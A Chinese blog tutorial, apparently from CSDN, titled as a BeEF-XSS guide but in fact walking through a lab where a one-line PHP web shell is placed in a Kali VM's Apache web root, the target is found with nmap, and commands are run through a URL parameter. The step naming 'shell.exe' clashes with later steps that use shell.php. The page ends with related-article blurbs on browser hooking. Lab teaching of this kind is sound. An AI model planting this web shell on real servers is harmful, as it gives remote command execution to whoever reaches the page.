Z2-BeEF-XSS渗透框架的使用

最新推荐文章于 2024-08-20 18:00:00 发布
最新推荐文章于 2024-08-20 18:00:00 发布
阅读量2.2k 收藏
点赞数
文章标签: apache 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/inskeyzh/article/details/121310655
版权

目录

一、准备

二、环境配置

1.root用户登录kali

2.创建shell.php

3.打开Apache

三、控制

一、准备

1.kali主机

2.kali靶机

如未安装kali虚拟机可参考以下链接:

Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程

二、环境配置

1.root用户登录kali

推荐使用root身份登录kali靶机,以避免测试过程出现权限问题。

如果不知道如何登录,可参考以下链接:

​​​​​​2020最新kali设置root用户(直接设置root用户/单用户模式设置root用户)_陈健平的博客-CSDN博客_kali怎么进入root用户

2.创建shell.php

Apache默认的网站目录是在/var/www/html

在靶机/var/www/html文件目录下右键单击创建文件shell.exe

 创建成功后打开该文件,输入以下内容:

<?php system($_REQUEST['CMD']);?>

保存并退出该文件

3.打开Apache

在靶机终端执行以下命令运行Apache

service apache2 start

三、控制

在kali主机执行命令:

ifconfig

以此查看主机ip:192.168.234.128

执行命令:

nmap 192.168.234.0/24

 以此扫描该网段下所有主机ip

发现靶机ip:192.168.234.139

打开主机浏览器,在网址输入栏输入下列网址并进入:

http://192.168.234.139//shell.php?CMD=ls

说明:“=”后面所接的是控制命令,执行“ls”命令可查看靶机目录文件

返回三个文件名,说明已经成功控制靶机 

现在我们看到的是该目录下的三个文件名,其中也包含了我们在靶机新建的shell.php

inskeyzh
关注
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏...)进行更高的抽象快速入门(使用Beef IDE) 下载raylib-beef并将其复制到以下位置: C:\ Progra
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6642
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
最新发布
wangluoanquan111的博客
08-20 995
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
Beefxss使用教程图文教程(超详细)
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
beef-xss安装与使用
Bu2n的博客
12-07 3500
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
web安全---xss漏洞/beef-xss基本使用
嘿嘿嘿
04-28 1328
xss漏洞----跨站脚本攻击(Cross Site Scripting),攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。
docker-beef:BeEF(浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉BeEF 的 Dockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
squid3-beEF:概念证明 - 使用 squid url 重写功能“劫持”代理流量并将 BeEF 负载注入其中
06-23
Squid3-beEF 概念证明 - 使用 url 重写功能“劫持”代理流量并将负载注入其中。 要求 PHP 5.3 阿帕奇 mod_php 安装 将 rewrite.php 和 payload.js 复制到 apache 文档根目录 使用以下命令使 rewrite.php 可执行...
spine-beef:将Spine运行时移植到牛肉
02-12
"spine-beef-main"可能包含Spine-beef项目的源代码,包括Spine.js的核心组件以及适应“牛肉”平台的特定代码修改或适配器。这个文件夹可能包含以下子目录和文件: 1. `src/` - 项目源代码,可能有`app.js`作为主...
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1553
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 6155
xss-工具-Beef-Xss安装以及使用
XSS漏洞利用工具BeEF
RockHan
11-06 812
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4296
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
工具----7、浏览器攻击框架--(BeEF
七天
01-19 2354
BeEF 是浏览器开发框架的缩写。它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。BeEF 将挂一个或多个 Web 浏览器,并将它们用作启动定向命令模块的滩头阵地,并从浏览器上下文中进一步攻击系统。 BeEf官网地址请点击 Kali下安装BeEF流程如下
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞。XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的敏感信息。 BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞的工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux中结合使用XSSBeEF可以实现对网站的全面安全检测和攻击。 “剑心哥哥”可能是指对网络安全有一定研究和实践经验的人,因为这些工具都需要一定的技术和知识才能使用。结合使用Kali LinuxXSSBeEF可以帮助“剑心哥哥”对网站进行全面的安全检测,并了解和利用XSS漏洞来展示其危害性。同时,也需要“剑心哥哥”具备一定的伦理和法律意识,不能利用这些工具进行非法攻击和侵犯他人隐私。通过学习和实践网络安全相关知识,我们可以更好地保护自己的网络安全,并为网络安全事业做出贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值